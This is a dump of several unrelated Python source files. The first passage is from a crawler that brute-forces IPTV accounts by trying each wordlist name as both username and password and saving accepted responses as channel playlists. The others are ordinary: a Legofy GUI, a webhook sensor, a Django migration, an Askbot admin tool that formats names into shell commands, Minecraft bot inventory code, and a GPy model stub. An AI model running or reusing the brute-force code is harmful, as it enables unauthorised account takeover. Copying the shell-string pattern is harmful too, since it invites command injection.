        of the site plus every account as five .m3u. Please use VLC for opening that
        kind of files

        Keyword arguments:
        url -- an url from the fetched list. (default None)

        Return:
        string -- the status of the crawling session
        """
        if not self.parsedUrls:
            return "You must fetch some URLs first"
        try:
            if not url:
                url = random.choice(self.parsedUrls)
            fileName = self.languageDir + "/" + self.language + ".txt"
            fileLength = self.file_length(fileName)
            progressBar = pyprind.ProgBar(fileLength, title = "Fetching account from " + url + " this might take a while.", stream = 1, monitor = True)
            # Matches are counted on self.foundedAccounts by create_file().
            with open(fileName) as f:
                rows = f.readlines()
                for row in rows:
                    opener = urllib2.build_opener()
                    opener.addheaders = [('User-agent', 'Mozilla/5.0')]
                    # Try username == password for every candidate name.
                    response = opener.open(url + self.basicString % (row.rstrip().lstrip(), row.rstrip().lstrip()))
                    fetched = response.read()
                    fileLength = fileLength - 1
                    progressBar.update()
                    # A non-empty body means the credentials were accepted.
                    if len(fetched) > 0:
                        newPath = self.outputDir + "/" + url.replace("http://", "")
                        self.create_file(row, newPath, fetched)
            self.parsedUrls.remove(url)
            if self.foundedAccounts != 0:
                return "Search done, account founded on " + url + ": " + str(self.foundedAccounts)
            else:
                return "No results for " + url
        except IOError:
            return "Cannot open the current Language file. Try another one"
        # 'as' exception syntax works on python 2.6+ and 3.x alike.
        except urllib2.HTTPError as e:
            return "Ops, HTTPError exception here. Cannot fetch the current URL " + str(e.code)
        except urllib2.URLError as e:
            return "Ops, the URL seems broken." + str(e.reason)
        except Exception:
            return "Ops something went wrong!"
    def create_file(self, row, newPath, fetched):
        """Create File

        Once the parse founds something worth it, we need to create the .m3u file
        to do so we except a newPath and the current row used from names file and also
        the content from the fetched response

        Keyword arguments:
        row -- row of the language file, this allow us to understand which names
        were useful for the brute force.
        newPath -- The path that we use to store the current fetched accounts.
        fetched -- the current response file from the attack.
        """
        if os.path.exists(newPath) is False:
            os.makedirs(newPath)
        outputFile = open(str(newPath) + "/tv_channels_%s.m3u" % row.rstrip().lstrip(), "w")
        outputFile.write(fetched)
        self.foundedAccounts = self.foundedAccounts + 1
        outputFile.close()
    def file_length(self, fileName):
        """File Length

        Cheapest way to calculate the rows of a file.
        Returns 0 for an empty file.

        Keyword arguments:
        fileName -- string the filename into which we will check its Length
        """
        with open(fileName) as f:
            # sum() handles the empty-file case; the old enumerate-based
            # version raised UnboundLocalError when the file had no lines.
            return sum(1 for _ in f)
|
data/JuanPotato/Legofy/legofy/legofy_gui.py
|
import os
import legofy
import tkinter as tk
import tkinter.ttk as ttk
from tkinter import filedialog
import tkinter.messagebox as tkmsg
LEGO_PALETTE = ('none', 'solid', 'transparent', 'effects', 'mono', 'all', )
class LegofyGui(tk.Tk):
    """Top-level Legofy window: a fixed-size root hosting the main frame."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.wm_title("Legofy!")
        # The window icon ships alongside this module.
        self.iconbitmap(os.path.dirname(os.path.realpath(__file__)) + '/assets/brick.ico')
        self.resizable(False, False)
        self.body = LegofyGuiMainFrame(self)
        self.body.grid(row=0, column=0, padx=10, pady=10)
class LegofyGuiMainFrame(tk.Frame):
    """Main frame: file picker, palette/brick parameters and convert button."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Currently selected image file object (None until the user picks one).
        self.chosenFile = None
        # Read-only display of the selected file path.
        self.chosenFilePath = tk.StringVar()
        self.pathField = tk.Entry(self, width=40, textvariable=self.chosenFilePath, state=tk.DISABLED)
        self.pathField.grid(row=0, column=0, padx=10)
        self.selectFile = tk.Button(self, text="Choose file...", command=self.choose_a_file)
        self.selectFile.grid(row=0, column=1)
        self.groupFrame = tk.LabelFrame(self, text="Params", padx=5, pady=5)
        self.groupFrame.grid(row=1, column=0, columnspan=2, )
        self.colorPaletteLabel = tk.Label(self.groupFrame, text = 'Color Palette')
        self.colorPaletteLabel.grid(row=0, column=0 )
        self.colorPalette = ttk.Combobox(self.groupFrame)
        self.colorPalette['values'] = LEGO_PALETTE
        self.colorPalette.current(0)
        self.colorPalette.grid(row=0, column=1)
        self.brickNumberScale = tk.Scale(self.groupFrame, from_=1, to=200, orient=tk.HORIZONTAL, label="Number of bricks (longer edge)", length=250)
        self.brickNumberScale.set(30)
        self.brickNumberScale.grid(row=1, column=0, columnspan=2, )
        # NOTE(review): no parent is passed here, so this button attaches to
        # the default root window rather than this frame -- confirm whether
        # that placement is intentional before changing it.
        self.convertFile = tk.Button(text="Legofy this image!", command=self.convert_file)
        self.convertFile.grid(row=2, column=0, columnspan=2)
    def choose_a_file(self):
        """Open a file dialog and remember the chosen image."""
        options = {}
        options['defaultextension'] = '.jpg'
        options['filetypes'] = [('JPEG', '.jpg'),
                                ('GIF', '.gif'),
                                ('PNG', '.png'),]
        options['initialdir'] = os.path.realpath("\\")
        options['initialfile'] = ''
        options['parent'] = self
        options['title'] = 'Choose a file'
        self.chosenFile = filedialog.askopenfile(mode='r', **options)
        if self.chosenFile:
            self.chosenFilePath.set(self.chosenFile.name)
    def convert_file(self):
        """Run legofy on the chosen file; report success/failure in a dialog."""
        try:
            if self.chosenFile is not None:
                palette = self.colorPalette.get()
                # 'none' means "no palette restriction" -> omit palette_mode.
                if palette in LEGO_PALETTE and palette != 'none':
                    legofy.main(self.chosenFile.name, size=self.brickNumberScale.get(), palette_mode=palette)
                else:
                    legofy.main(self.chosenFile.name, size=self.brickNumberScale.get())
                tkmsg.showinfo("Success!", "Your image has been legofied!")
            else:
                tkmsg.showerror("File not found", "Please select a file before legofying")
        except Exception as e:
            tkmsg.showerror("Error", str(e))
if __name__ == '__main__':
    # Launch the GUI event loop when run as a script.
    app = LegofyGui()
    app.mainloop()
|
data/StackStorm/st2contrib/packs/circle_ci/sensors/webhook_sensor.py
|
import json
from flask import Flask, request, abort
from st2reactor.sensor.base import Sensor
TRIGGER_REF = 'circle_ci.build_event'
class CircleCIWebhookSensor(Sensor):
    """st2 sensor running a small Flask app that receives CircleCI webhooks
    and dispatches them as ``circle_ci.build_event`` triggers."""
    def setup(self):
        self.host = self._config['host']
        self.port = self._config['port']
        # Whitelist of webhook endpoints accepted by this sensor.
        self._endpoints = self._config['endpoints']
        self.app = Flask(__name__)
        self.trigger_ref = TRIGGER_REF
        self.log = self._sensor_service.get_logger(__name__)
        # Routes are registered as closures so they can access sensor state.
        @self.app.route('/status')
        def status():
            # Simple liveness probe.
            return json.dumps({'response': 'OK'})
        @self.app.route('/webhooks/<path:endpoint>', methods=['POST'])
        def build_events(endpoint):
            # Reject endpoints not whitelisted in the sensor config.
            if endpoint not in self._endpoints:
                self.log.error('Ignoring unknown endpoint : %s', endpoint)
                abort(404)
            webhook_body = request.get_json()
            payload = {}
            payload['headers'] = self._get_headers_as_dict(request.headers)
            payload['body'] = webhook_body
            response = self._sensor_service.dispatch(self.trigger_ref, payload)
            self.log.debug(json.dumps(response))
            return json.dumps({'response': 'triggerposted'})
    def run(self):
        # Blocks serving HTTP until the sensor process is stopped.
        self.app.run(host=self.host, port=self.port, threaded=True)
    def cleanup(self):
        pass
    def _get_headers_as_dict(self, headers):
        # Request headers iterate as (key, value) pairs; flatten to a dict.
        headers_dict = {}
        for key, value in headers:
            headers_dict[key] = value
        return headers_dict
    # Trigger lifecycle callbacks are unused by this webhook sensor.
    def add_trigger(self, trigger):
        pass
    def update_trigger(self, trigger):
        pass
    def remove_trigger(self, trigger):
        pass
|
data/adamchainz/django-mysql/tests/testapp/enum_default_migrations/0003_remove_some_fields.py
|
from __future__ import unicode_literals
from django.db import migrations
from django_mysql.models import EnumField
class Migration(migrations.Migration):
    """Narrows EnumDefaultModel.field's choices relative to 0002."""
    dependencies = [
        ('testapp', '0002_add_some_fields'),
    ]
    operations = [
        migrations.AlterField(
            model_name='EnumDefaultModel',
            name='field',
            field=EnumField(choices=[
                # EnumField accepts bare strings alongside (value, label) pairs.
                ('lion', 'Lion'), ('tiger', 'Tiger'), 'oh my!'
            ])
        ),
    ]
|
data/OpenMOOC/askbot-openmooc/askbotopenmooc/utils/openmooc-askbot-instancetool.py
|
"""
Askbot instance administration tool for creating, disabling or destroying
askbot instances
"""
import sys
import os
import time
# Interpreter guard: the tool targets python 2.6/2.7 and refuses 3.x.
if sys.version_info < (2, 6, 0):
    print(' [WARNING] This script needs python 2.6. We don\'t guarantee it '
          'works on other python versions.')
elif sys.version_info >= (3, 0, 0):
    sys.stderr.write(' [ERROR] This script doesn\'t work in python 3.x series. '
                     'Exiting.')
    sys.exit(2)
# Make the system-wide config and the current directory importable.
sys.path.insert(0, '/etc/openmooc/askbot')
sys.path.insert(0, os.getcwd())
import shutil
import optparse
import requests
import subprocess
try:
    # Site-specific settings plus the PostgreSQL binding are hard requirements.
    import instances_creator_conf as icc
    import psycopg2
except ImportError:
    sys.stderr.write(' [ERROR] Either we couldn\'t import the default settings '
                     '(instances_creator_conf) or you don\'t have psycopg2 '
                     '(Python PostgreSQL binding) installed.')
    sys.exit(3)
# createdb/dropdb read the password from the environment.
os.environ['PGPASSWORD'] = icc.DB_PASSWORD
class AskbotInstance():
    """Creates, disables and destroys OpenMOOC Askbot instances."""
    def __init__(self):
        """
        Shared stuff between all the methods.
        """
        # .get() avoids a KeyError when USER is absent from the environment.
        if not os.environ.get('USER') == 'root':
            self.abort(' [ERROR] This script requires root access.')
        sys.path.insert(0, icc.DEFAULT_INSTANCE_DIR)
    def _populate_file(self, original_file, values):
        """
        Basic abstraction layer for populating files on demand

        original_file has to be a path to the file in string format
        values is a dictionary containing the necessary key:value pairs.
        """
        f = open(original_file, 'r')
        file_content = f.read()
        f.close()
        # str.format() fills the {placeholders} in the template file.
        populated_settings = file_content.format(**values)
        f = open(original_file, 'w')
        f.write(populated_settings)
        f.close()
    def create_instance(self, instance_name, instance_db_name):
        """
        Create the main instance in the instances directory.
        """
        INSTANCE_DIR = os.path.join(icc.DEFAULT_INSTANCE_DIR, instance_name)
        try:
            shutil.copytree(icc.SKEL_DIR, INSTANCE_DIR)
            os.chdir(INSTANCE_DIR)
            template = os.path.join(INSTANCE_DIR, 'instance_settings.py')
            os.symlink(
                os.path.join('/usr', 'bin', 'openmooc-askbot-admin'),
                os.path.join(INSTANCE_DIR, 'manage.py'))
            values = {
                'instance_name': instance_name,
                'instance_db_name': instance_db_name,
                'instance_db_host': icc.DB_HOST,
                'base_url': icc.BASE_URL
            }
            self._populate_file(template, values)
            print(' [ OK ] Instance {0} created.'.format(instance_name))
        # Narrowed from a bare except so SystemExit/KeyboardInterrupt escape.
        except Exception:
            self.abort(' [ERROR] Couldn\'t copy the instance skeleton into '
                       'destination or populate the settings. Please check: '
                       'a) You have permission. '
                       'b) The directory doesn\'t exist already.')
    def create_db(self, instance_db_name):
        """
        Create the database for the designated instance.
        """
        createdb = subprocess.Popen(('su - postgres -c "createdb %s -w -O %s '
                                     '-E UTF8"') % (instance_db_name,
                                                    icc.DB_USER), shell=True)
        createdb.wait()
        try:
            # Open a throwaway connection just to verify credentials work.
            psycopg2.connect(
                database=instance_db_name,
                user=icc.DB_USER,
                password=icc.DB_PASSWORD,
                host=icc.DB_HOST
            )
            print(' [ OK ] Database {0} created and connection '
                  'tested.'.format(instance_db_name))
        except Exception:
            self.abort(' [ERROR] Couldn\'t connect to the PostgreSQL server '
                       '(authentication failed or server down). Aborting.')
    def syncdb_and_migrate(self, instance_name):
        """
        Do the syncdb and migrate actions for the selected intance. Please note
        that this action does not create the superuser, it just synchronizes
        and migrates the database.
        """
        working_dir = os.path.join(icc.DEFAULT_INSTANCE_DIR, instance_name)
        os.chdir(working_dir)
        syncdb = subprocess.Popen(('openmooc-askbot-admin syncdb --migrate '
                                   '--noinput'), shell=True)
        syncdb.wait()
    # Parameter renamed from the original's 'seld' typo; callers are
    # unaffected since it is the implicit instance argument.
    def collect_static(self, instance_name):
        """
        Collect all the static files and prepare them to be used
        """
        working_dir = os.path.join(icc.DEFAULT_INSTANCE_DIR, instance_name)
        os.chdir(working_dir)
        collectstatic = subprocess.Popen(('openmooc-askbot-admin '
                                          'collectstatic --noinput'),
                                         shell=True)
        collectstatic.wait()
    def add_instance_to_supervisor(self, instance_name):
        """
        Creates the supervisor file into the directory
        """
        INSTANCE_DIR = os.path.join(icc.DEFAULT_INSTANCE_DIR, instance_name)
        try:
            template = os.path.join(INSTANCE_DIR, 'supervisor.conf')
            values = {
                'instance_name': instance_name,
                'instance_dir': INSTANCE_DIR
            }
            self._populate_file(template, values)
            os.symlink(template, os.path.join(
                '/etc', 'supervisord.d',
                'openmooc-askbot-%s.conf' % instance_name))
            print(' [ OK ] Populated the supervisor settings.')
        except Exception:
            self.abort(' [ERROR] Couldn\'t populate the supervisor settings. '
                       'Exiting.')
    def add_instance_to_nginx(self, instance_name):
        """
        Creates the nginx file for the local askbot and also the nginx forward
        configuration for the proxy machine. Remember that some values of the
        forward file need to be changed manually!
        """
        INSTANCE_DIR = os.path.join(icc.DEFAULT_INSTANCE_DIR, instance_name)
        try:
            template = os.path.join(INSTANCE_DIR, 'nginx.conf')
            values = {'instance_name': instance_name}
            self._populate_file(template, values)
            template = os.path.join(INSTANCE_DIR, 'nginx.forward.conf')
            values = {'instance_name': instance_name}
            self._populate_file(template, values)
            print(' [ OK ] Populated nginx and nginx.forward settings.')
        except Exception:
            self.abort(' [ERROR] Couldn\'t populate the nginx or the '
                       'nginx.forward settings. Exiting.')
    def restart_server(self):
        """Restart supervisord and nginx, then give services time to come up."""
        supervisord = subprocess.Popen(('service '
                                        'supervisord restart'), shell=True)
        supervisord.wait()
        nginx = subprocess.Popen(('service '
                                  'nginx restart'), shell=True)
        nginx.wait()
        time.sleep(5)
    def update_entries_metadata(self):
        """
        Update all entries' metadata
        """
        try:
            update_metadata = subprocess.Popen(('openmooc-askbot-admin '
                                                'update_entries_metadata'),
                                               shell=True)
            update_metadata.wait()
            # Kick the IdP's metarefresh cron endpoint afterwards.
            url = ('https://idp.mooc.educalab.es/simplesaml/module.php/cron/'
                   'cron.php?key=%s&tag=metarefresh') % icc.META_REFRESH_KEY
            requests.get(url)
        except Exception:
            self.abort(' [ERROR] Couldn\'t update the entries\' metadata. '
                       'Exiting.')
    def disable_instance(self, instance_name):
        """
        Disables an instance so it won't be available anymore.
        """
        INSTANCE_DIR = os.path.join(icc.DEFAULT_INSTANCE_DIR, instance_name)
        try:
            if not os.path.isdir(icc.DEFAULT_DISABLED_INSTANCES_DIR):
                os.makedirs(icc.DEFAULT_DISABLED_INSTANCES_DIR)
            # shutil.copy() cannot copy a directory (it always raised here);
            # copytree preserves the whole instance tree before removal.
            destination = os.path.join(icc.DEFAULT_DISABLED_INSTANCES_DIR,
                                       instance_name)
            shutil.copytree(INSTANCE_DIR, destination)
            shutil.rmtree(INSTANCE_DIR)
            print(' [ OK ] Instance {0} disabled.'.format(instance_name))
        except Exception:
            self.abort(' [ERROR] Couldn\'t disable the instance. Please check '
                       'the directories.')
    def destroy_instance(self, instance_name):
        """
        Destroys the database and contents of the instance completely
        """
        INSTANCE_DIR = os.path.join(icc.DEFAULT_INSTANCE_DIR, instance_name)
        sys.path.insert(0, INSTANCE_DIR)
        try:
            import instance_settings
        except Exception:
            self.abort(' [ERROR] Couldn\'t import the instance settings to '
                       'destroy it. Check that it exists. Aborting.')
        try:
            instance_db_name = instance_settings.DATABASE_NAME
            dropdb = subprocess.Popen('su - postgres -c "dropdb %s"' %
                                      instance_db_name, shell=True)
            dropdb.wait()
            shutil.rmtree(INSTANCE_DIR)
            os.remove(os.path.join('/etc', 'supervisord.d',
                                   'openmooc-askbot-%s.conf' % instance_name))
            print(' [ OK ] Instance {0} destroyed.'.format(instance_name))
        except Exception:
            self.abort(' [ERROR] Couldn\'t drop database or remove instance '
                       'files. Aborting.')
    def abort(self, msg, status=1):
        """Write msg to stderr and exit with the given status code."""
        sys.stderr.write(msg)
        sys.exit(status)
# Command-line interface: exactly one of --create/--disable/--destroy applies.
parser = optparse.OptionParser(
    description=('This is OpenMOOC Askbot instance creator. This allows you '
                 'to easily create new instances for OpenMOOC Askbot without '
                 'any of the fuss of the terminal.'),
    version='%prog 0.1 alpha'
)
parser.add_option(
    '-c',
    '--create',
    help='<instance name> <instance database name>',
    dest='instance_data',
    action='store',
    nargs=2
)
parser.add_option(
    '-d',
    '--disable',
    help='Disables an instance (data is moved to /instances.disabled)',
    dest='disable_instance_name'
)
parser.add_option(
    '-k',
    '--destroy',
    help='Complete destroys an instance (erase everything)',
    dest='destroy_instance_name'
)
parser.add_option(
    '--no-metadata',
    help='Avoid updating the entries\' metadata',
    action='store_true',
    dest='no_metadata'
)
(opts, args) = parser.parse_args()
inst = AskbotInstance()
if opts.instance_data:
    # Full provisioning pipeline: files, supervisor, nginx, DB, static assets.
    INSTANCE_NAME = opts.instance_data[0]
    INSTANCE_DB_NAME = opts.instance_data[1]
    inst.create_instance(INSTANCE_NAME, INSTANCE_DB_NAME)
    inst.add_instance_to_supervisor(INSTANCE_NAME)
    inst.add_instance_to_nginx(INSTANCE_NAME)
    inst.create_db(INSTANCE_DB_NAME)
    inst.syncdb_and_migrate(INSTANCE_NAME)
    inst.collect_static(INSTANCE_NAME)
    inst.restart_server()
    if not opts.no_metadata:
        inst.update_entries_metadata()
elif opts.disable_instance_name:
    INSTANCE_NAME = opts.disable_instance_name
    inst.disable_instance(INSTANCE_NAME)
elif opts.destroy_instance_name:
    INSTANCE_NAME = opts.destroy_instance_name
    inst.destroy_instance(INSTANCE_NAME)
|
data/SpockBotMC/SpockBot/spockbot/mcdata/windows.py
|
import sys
import types
from minecraft_data.v1_8 import windows as windows_by_id
from minecraft_data.v1_8 import windows_list
from spockbot.mcdata import constants, get_item_or_block
from spockbot.mcdata.blocks import Block
from spockbot.mcdata.items import Item
from spockbot.mcdata.utils import camel_case, snake_case
def make_slot_check(wanted):
    """
    Creates and returns a function that takes a slot
    and checks if it matches the wanted item.

    Args:
        wanted: function(Slot) or Slot or itemID or (itemID, metadata)
    """
    if isinstance(wanted, types.FunctionType):
        return wanted  # already a predicate
    if isinstance(wanted, int):
        item_id, metadata = wanted, None
    elif isinstance(wanted, Slot):
        item_id, metadata = wanted.item_id, wanted.damage
    elif isinstance(wanted, (Item, Block)):
        item_id, metadata = wanted.id, wanted.metadata
    elif isinstance(wanted, str):
        resolved = get_item_or_block(wanted, init=True)
        item_id, metadata = resolved.id, resolved.metadata
    else:
        try:
            item_id, metadata = wanted
        except TypeError:
            raise ValueError('Illegal args for make_slot_check(): %s' % wanted)

    def check(slot):
        # None metadata acts as a wildcard over damage values.
        return item_id == slot.item_id and metadata in (None, slot.damage)
    return check
class Slot(object):
    """One inventory slot: item id, damage, stack amount and NBT data."""

    def __init__(self, window, slot_nr, id=constants.INV_ITEMID_EMPTY,
                 damage=0, amount=0, enchants=None):
        self.window = window
        self.slot_nr = slot_nr
        self.item_id = id
        self.damage = damage
        self.amount = amount
        self.nbt = enchants
        # Resolve the item descriptor, falling back to a blank Item.
        self.item = get_item_or_block(self.item_id, self.damage) or Item()

    def move_to_window(self, window, slot_nr):
        """Re-home this slot into another window/slot position."""
        self.window = window
        self.slot_nr = slot_nr

    @property
    def is_empty(self):
        return self.amount <= 0

    def matches(self, other):
        """True if this slot matches the wanted-item spec ``other``."""
        return make_slot_check(other)(self)

    def stacks_with(self, other):
        """True if ``other`` holds the same stackable item kind."""
        same_kind = (self.item_id == other.item_id
                     and self.damage == other.damage)
        return same_kind and self.item.stack_size != 1

    def get_dict(self):
        """ Formats the slot for network packing. """
        data = {'id': self.item_id}
        if self.item_id == constants.INV_ITEMID_EMPTY:
            return data
        data['damage'] = self.damage
        data['amount'] = self.amount
        if self.nbt is not None:
            data['enchants'] = self.nbt
        return data

    def copy(self):
        """Return an independent Slot with identical contents."""
        return Slot(self.window, self.slot_nr, self.item_id,
                    self.damage, self.amount, self.nbt)

    def __bool__(self):
        return not self.is_empty

    def __repr__(self):
        if self.is_empty:
            desc = 'empty'
        else:
            desc = '%i/%i %s' % (self.amount, self.item.stack_size,
                                 str(self.item))
        if self.slot_nr != -1:
            desc += ' at %i' % self.slot_nr
        if self.window:
            desc += ' in %s' % self.window
        return '<Slot: %s>' % desc
class SlotCursor(Slot):
    """The pseudo-slot that rides on the mouse cursor."""

    def __init__(self, id=constants.INV_ITEMID_EMPTY, damage=0, amount=0,
                 enchants=None):
        # The cursor belongs to no real window; give it a stub window
        # object so Slot's bookkeeping keeps working.
        class CursorWindow(object):
            window_id = constants.INV_WINID_CURSOR

            def __repr__(self):
                return 'CursorWindow()'

        super(SlotCursor, self).__init__(
            CursorWindow(), constants.INV_SLOT_NR_CURSOR,
            id, damage, amount, enchants)
class BaseClick(object):
    """Shared machinery for inventory click actions (packet + local apply)."""

    def get_packet(self, inv_plugin):
        """
        Called by send_click() to prepare the sent packet.
        Abstract method.

        Args:
            inv_plugin (InventoryPlugin): inventory plugin instance
        """
        raise NotImplementedError()

    def apply(self, inv_plugin):
        """
        Called by on_success().
        Abstract method.

        Args:
            inv_plugin (InventoryPlugin): inventory plugin instance
        """
        raise NotImplementedError()

    def on_success(self, inv_plugin, emit_set_slot):
        """
        Called when the click was successful
        and should be applied to the inventory.

        Args:
            inv_plugin (InventoryPlugin): inventory plugin instance
            emit_set_slot (func): function to signal a slot change,
                should be InventoryPlugin().emit_set_slot
        """
        self.dirty = set()
        self.apply(inv_plugin)
        for touched in self.dirty:
            emit_set_slot(touched)

    def copy_slot_type(self, slot_from, slot_to):
        """Copy the item identity (id/damage/nbt), leaving the amount alone."""
        slot_to.item_id = slot_from.item_id
        slot_to.damage = slot_from.damage
        slot_to.nbt = slot_from.nbt
        self.mark_dirty(slot_to)

    def swap_slots(self, slot_a, slot_b):
        """Exchange the full contents of two slots."""
        for attr in ('item_id', 'damage', 'amount', 'nbt'):
            held = getattr(slot_a, attr)
            setattr(slot_a, attr, getattr(slot_b, attr))
            setattr(slot_b, attr, held)
        self.mark_dirty(slot_a)
        self.mark_dirty(slot_b)

    def transfer(self, from_slot, to_slot, max_amount):
        """Move up to max_amount items, limited by stock and stack size."""
        space_left = to_slot.item.stack_size - to_slot.amount
        moved = min(max_amount, from_slot.amount, space_left)
        if moved <= 0:
            return
        self.copy_slot_type(from_slot, to_slot)
        to_slot.amount += moved
        from_slot.amount -= moved
        self.cleanup_if_empty(from_slot)

    def cleanup_if_empty(self, slot):
        """Reset a drained slot back to the canonical empty state."""
        if slot.is_empty:
            blank = Slot(slot.window, slot.slot_nr)
            self.copy_slot_type(blank, slot)
        self.mark_dirty(slot)

    def mark_dirty(self, slot):
        """Record that a slot changed while apply() is running."""
        self.dirty.add(slot)
class SingleClick(BaseClick):
    """A single left/right mouse click on one slot (click mode 0)."""

    def __init__(self, slot, button=constants.INV_BUTTON_LEFT):
        self.slot = slot
        self.button = button
        # Only plain left/right clicks are supported by mode 0.
        if button not in (constants.INV_BUTTON_LEFT,
                          constants.INV_BUTTON_RIGHT):
            raise NotImplementedError(
                'Clicking with button %s not implemented' % button)

    def get_packet(self, inv_plugin):
        """Build the click_window payload for this click."""
        slot_nr = self.slot.slot_nr
        # Clicking the cursor slot means clicking outside the window,
        # which drops the cursor stack.
        if self.slot == inv_plugin.cursor_slot:
            slot_nr = constants.INV_OUTSIDE_WINDOW
        return {
            'slot': slot_nr,
            'button': self.button,
            'mode': 0,
            'clicked_item': self.slot.get_dict(),
        }

    def apply(self, inv_plugin):
        """Mirror the server's click semantics on the local inventory."""
        clicked = self.slot
        cursor = inv_plugin.cursor_slot
        if clicked == cursor:
            # Click outside the window: drop all (left) or one (right).
            if self.button == constants.INV_BUTTON_LEFT:
                clicked.amount = 0
            elif self.button == constants.INV_BUTTON_RIGHT:
                clicked.amount -= 1
            self.cleanup_if_empty(clicked)
        elif self.button == constants.INV_BUTTON_LEFT:
            # Left click: merge the cursor stack into the slot if they
            # stack together, otherwise swap the two.
            if clicked.stacks_with(cursor):
                self.transfer(cursor, clicked, cursor.amount)
            else:
                self.swap_slots(cursor, clicked)
        elif self.button == constants.INV_BUTTON_RIGHT:
            if cursor.is_empty:
                # Pick up the larger half of the clicked stack.
                self.transfer(clicked, cursor, (clicked.amount + 1) // 2)
            elif clicked.is_empty or clicked.stacks_with(cursor):
                # Deposit a single item from the cursor.
                self.transfer(cursor, clicked, 1)
            else:
                self.swap_slots(cursor, clicked)
        else:
            raise NotImplementedError(
                'Clicking with button %s not implemented' % self.button)
class DropClick(BaseClick):
    """Drop one item (or the whole stack) out of a slot (click mode 4)."""

    def __init__(self, slot, drop_stack=False):
        self.slot = slot
        self.drop_stack = drop_stack

    def get_packet(self, inv_plugin):
        """Build the click_window payload; only valid with an empty cursor."""
        if self.slot == inv_plugin.cursor_slot:
            raise ValueError("Can't drop cursor slot, use SingleClick")
        if not inv_plugin.cursor_slot.is_empty:
            raise ValueError("Can't drop other slots: cursor slot is occupied")
        button = 1 if self.drop_stack else 0
        return {
            'slot': self.slot.slot_nr,
            'button': button,
            'mode': 4,
            'clicked_item': inv_plugin.cursor_slot.get_dict(),
        }

    def apply(self, inv_plugin):
        """Mirror the drop locally: remove one item or the entire stack."""
        if self.drop_stack:
            self.slot.amount = 0
        else:
            self.slot.amount -= 1
        self.cleanup_if_empty(self.slot)
class Window(object):
    """ Base class for all inventory types. """

    # Overridden by the subclasses generated in _make_window().
    name = None
    inv_type = None
    inv_data = {}

    def __init__(self, window_id, title, slot_count,
                 inv_type=None, persistent_slots=None, eid=None):
        assert not inv_type or inv_type == self.inv_type, \
            'inv_type differs: %s instead of %s' % (inv_type, self.inv_type)
        # Windows that declare no storage slots derive their slot count
        # from the minecraft_data window definition instead.
        self.is_storage = slot_count > 0
        if not self.is_storage:
            window_dict = windows_by_id[inv_type]
            if 'slots' in window_dict:
                slot_count = max(slot['index'] + slot.get('size', 1)
                                 for slot in window_dict['slots'])
        self.window_id = window_id
        self.title = title
        self.eid = eid
        self.slots = [Slot(self, slot_nr) for slot_nr in range(slot_count)]
        # The persistent slots (player inventory + hotbar) are shared
        # between windows: either create fresh ones, or adopt the previous
        # window's so their contents carry over.
        if persistent_slots is None:
            for slot_nr in range(constants.INV_SLOTS_PERSISTENT):
                self.slots.append(Slot(self, slot_nr + slot_count))
        else:
            moved_slots = persistent_slots[-constants.INV_SLOTS_PERSISTENT:]
            for slot_nr, moved_slot in enumerate(moved_slots):
                moved_slot.move_to_window(self, slot_nr + slot_count)
                self.slots.append(moved_slot)
        self.properties = {}

    def __repr__(self):
        return '%s(window_id=%i, title=%s, slot_count=%i)' % (
            self.__class__.__name__,
            self.window_id, self.title, len(self.slots))

    @property
    def persistent_slots(self):
        """Inventory plus hotbar: the slots shared across windows."""
        return self.slots[-constants.INV_SLOTS_PERSISTENT:]

    @property
    def inventory_slots(self):
        """The main player inventory (persistent slots minus the hotbar)."""
        return self.slots[
            -constants.INV_SLOTS_PERSISTENT:-constants.INV_SLOTS_HOTBAR]

    @property
    def hotbar_slots(self):
        """The hotbar slots."""
        return self.slots[-constants.INV_SLOTS_HOTBAR:]

    @property
    def window_slots(self):
        """All slots except inventory and hotbar. Useful for searching."""
        return self.slots[:-constants.INV_SLOTS_PERSISTENT]
def _make_window(window_dict):
    """
    Creates a new class for that window and registers it at this module.
    """
    cls_name = '%sWindow' % camel_case(str(window_dict['name']))
    bases = (Window,)
    # NOTE(review): __module__ is conventionally the module's *name* string;
    # here the module object itself is stored -- confirm downstream usage.
    attrs = {
        '__module__': sys.modules[__name__],
        'name': str(window_dict['name']),
        'inv_type': str(window_dict['id']),
        'inv_data': window_dict,
    }

    # Generate a `<slot name>_slot`/`_slots` accessor property for each
    # declared slot or slot range; defaults bind index/size at closure time.
    def make_slot_method(index, size=1):
        if size == 1:
            return lambda self: self.slots[index]
        else:
            return lambda self: self.slots[index:(index + size)]
    for slots in window_dict.get('slots', []):
        index = slots['index']
        size = slots.get('size', 1)
        attr_name = snake_case(str(slots['name']))
        attr_name += '_slot' if size == 1 else '_slots'
        slots_method = make_slot_method(index, size)
        slots_method.__name__ = attr_name
        attrs[attr_name] = property(slots_method)

    # Likewise one read-only accessor per declared window property; the
    # nested factory binds the loop index early to avoid late binding.
    for i, prop_name in enumerate(window_dict.get('properties', [])):
        def make_prop_method(i):
            return lambda self: self.properties[i]
        prop_method = make_prop_method(i)
        prop_name = snake_case(str(prop_name))
        prop_method.__name__ = prop_name
        attrs[prop_name] = property(prop_method)

    cls = type(cls_name, bases, attrs)
    # Guard against duplicate registrations before publishing the class.
    assert not hasattr(sys.modules[__name__], cls_name), \
        'Window "%s" already registered at %s' % (cls_name, __name__)
    setattr(sys.modules[__name__], cls_name, cls)
    return cls
# Registry mapping inv_type id -> generated Window subclass.
inv_types = {}
def _create_windows():
    # Generate one Window subclass per minecraft_data window definition.
    for window in windows_list:
        cls = _make_window(window)
        inv_types[cls.inv_type] = cls
_create_windows()
# The player inventory window is special: it always exists with a fixed
# window id and slot count, so pre-bind those arguments in its __init__.
_player_window = sys.modules[__name__].PlayerWindow
def _player_init(self, *args, **kwargs):
    super(_player_window, self).__init__(
        constants.INV_WINID_PLAYER, self.name, constants.INV_SLOTS_PLAYER,
        *args, **kwargs)
setattr(_player_window, '__init__', _player_init)
|
data/SheffieldML/GPy/GPy/models/warped_gp.py
|
import numpy as np
from ..util.warping_functions import *
from ..core import GP
from .. import likelihoods
from GPy.util.warping_functions import TanhWarpingFunction_d
from GPy import kern
class WarpedGP(GP):
    """Gaussian process regression with a warped observation space.

    The targets Y are mapped through a monotonic warping function f, a GP
    with Gaussian likelihood is fit to f(Y), and predictions are mapped
    back through f^-1 (directly for the median, by Gauss-Hermite
    quadrature for mean and variance).
    """

    def __init__(self, X, Y, kernel=None, warping_function=None, warping_terms=3):
        """
        :param X: input observations
        :param Y: output observations (in the un-warped space)
